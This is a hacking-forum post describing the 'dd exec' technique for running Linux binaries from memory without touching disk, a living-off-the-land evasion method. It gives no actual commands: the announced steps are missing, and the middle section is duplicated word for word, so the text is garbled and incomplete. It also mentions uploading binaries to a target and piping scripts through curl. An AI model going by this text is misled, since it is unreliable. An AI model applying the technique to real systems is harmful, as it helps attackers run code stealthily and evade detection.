OP 30 April, 2023 - 06:17 PM
(This post was last modified: 02 May, 2023 - 10:01 PM by Honeypot. Edited 4 times in total.)
To execute Linux binaries without touching the disk, you can use a technique called "reflective execution" that executes all files out of memory. This technique is not new, and there are already some resources available online that showcase it.
However, in this guide, we are going to focus on a specific method called "dd exec" that uses the binary "dd" to exploit itself and get code execution. The beauty of this technique is that it's a "living off the land" method that only requires the "dd" binary to be on the box, which is usually available on most systems.
To use the dd exec method, you can follow these steps:
One thing to keep in mind is that the example command in the dd exec repository requires the binary to be base64 encoded, which can be an issue if there are null bytes in the binary. To avoid this issue, you can upload the binary to the target system and patch it in an argument.
Also, the dd exec method requires the "dd" binary to be on the box, which may not be available on some minimal systems. However, you can use process substitution to pass arguments to bash scripts when piping with curl, which can help you remove the need for dd exec on the box.
Conclusion
Overall, the dd exec method is a powerful technique for executing Linux binaries without touching the disk, and it can be a useful tool for penetration testers and security researchers.
However, in this guide, we are going to focus on a specific method called "dd exec" that uses the binary "dd" to exploit itself and get code execution. The beauty of this technique is that it's a "living off the land" method that only requires the "dd" binary to be on the box, which is usually available on most systems.
To use the dd exec method, you can follow these steps:
One thing to keep in mind is that the example command in the dd exec repository requires the binary to be base64 encoded, which can be an issue if there are null bytes in the binary. To avoid this issue, you can upload the binary to the target system and patch it in an argument.
Also, the dd exec method requires the "dd" binary to be on the box, which may not be available on some minimal systems. However, you can use process substitution to pass arguments to bash scripts when piping with curl, which can help you remove the need for dd exec on the box.
Conclusion
Overall, the dd exec method is a powerful technique for executing Linux binaries without touching the disk, and it can be a useful tool for penetration testers and security researchers.
![[Image: OJRQ6B0.jpg]](https://imgur.com/OJRQ6B0.jpg)
![[Image: mesvak2.png]](https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fstatic.cracked.sh%2Fimages%2Fsmilies%2Fmesvak2.png)
![[Image: hammer2.gif]](https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fstatic.cracked.sh%2Fimages%2Fsmilies%2Fhammer2.gif)